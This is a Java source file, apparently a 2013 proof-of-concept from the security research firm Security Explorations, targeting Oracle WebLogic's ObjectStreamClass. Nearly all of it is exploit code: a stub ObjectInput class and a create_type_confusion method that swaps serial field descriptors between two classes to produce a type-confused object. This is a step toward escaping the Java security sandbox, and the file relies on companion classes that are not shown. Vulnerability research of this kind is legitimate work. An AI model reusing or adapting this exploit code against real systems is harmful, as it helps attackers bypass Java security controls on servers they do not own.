/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* weblogic.utils.io.ObjectStreamClass                                        */
/* the possibility to change serial fields layout                             */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.io.PrintWriter;
import java.security.*;
import weblogic.utils.io.*;

public class Vuln3 {

 public static class MyObjectInput implements ObjectInput {

  public Object readObject(Class c) {
   if (c.getName().equals("Helper")) {
    return new Helper();
   }

   return null;
  }

  public Object readObject() {
   return null;
  }  

  public int read() {
   return 0;
  }

  public int read(byte abyte0[]) {
   return 0;
  }

  public int read(byte abyte0[], int i, int j) {
   return 0;
  }

  public long skip(long l) {
   return 0;
  }

  public int available() {
   return 0;
  }

  public void close() {
  }

  public void readFully(byte abyte0[]) {
  }

  public void readFully(byte abyte0[], int i, int j) {
  }

  public int skipBytes(int i) {
   return 0;
  }


  public boolean readBoolean() {
   return false;
  }

  public byte readByte() {
   return 0;
  }

  public int readUnsignedByte() {
   return 0;
  }

  public short readShort() {
   return 0;
  }

  public int readUnsignedShort() {
   return 0;
  }

  public char readChar() {
   return 0;
  }

  public int readInt() {
   return 0;
  }

  public long readLong() {
   return 0;
  }

  public float readFloat() {
   return 0;
  }

  public double readDouble() {
   return 0;
  }

  public String readLine() {
   return null;
  }

  public String readUTF() {
   return null;
  }

 }

 public static void create_type_confusion(PrintWriter out) {
  try {
   ObjectStreamClass osc1=ObjectStreamClass.lookup(Class.forName("Dummy1"));
   ObjectStreamClass osc2=ObjectStreamClass.lookup(Class.forName("Dummy2"));

   ObjectStreamField[] ftab1=osc1.getFields();
   ObjectStreamField[] ftab2=osc2.getFields();

   ftab2[0]=ftab1[1];
   ftab2[1]=ftab1[0];

   Dummy2 d2=new Dummy2();
   MyObjectInput moi=new MyObjectInput();
   osc2.readFields(d2,moi);

   Test.d2=d2;

  } catch(Throwable t) {
   t.printStackTrace(out);
  }
 }
}
